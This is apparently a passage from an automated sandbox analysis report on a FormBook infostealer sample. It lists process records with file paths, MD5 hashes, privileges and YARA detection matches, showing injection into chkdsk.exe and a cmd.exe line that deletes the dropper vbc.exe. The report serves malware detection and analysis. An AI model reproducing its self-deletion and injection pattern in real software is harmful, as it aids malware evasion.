                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                          Imagebase:0x11d0000
                                                                                                                                                          File size:844800 bytes
                                                                                                                                                          MD5 hash:6A763ED09B2FD9F663BCB0AF7B17D492
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:17:17:22
                                                                                                                                                          Start date:13/01/2021
                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:
                                                                                                                                                          Imagebase:0xffca0000
                                                                                                                                                          File size:3229696 bytes
                                                                                                                                                          MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:moderate

                                                                                                                                                          General

                                                                                                                                                          Start time:17:17:39
                                                                                                                                                          Start date:13/01/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                                                          Imagebase:0x330000
                                                                                                                                                          File size:16384 bytes
                                                                                                                                                          MD5 hash:A01E18A156825557A24A643A2547AA8C
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Reputation:moderate

                                                                                                                                                          General

                                                                                                                                                          Start time:17:17:43
                                                                                                                                                          Start date:13/01/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                          Imagebase:0x4a300000
                                                                                                                                                          File size:302592 bytes
                                                                                                                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Disassembly

                                                                                                                                                          Code Analysis

                                                                                                                                                          Reset < >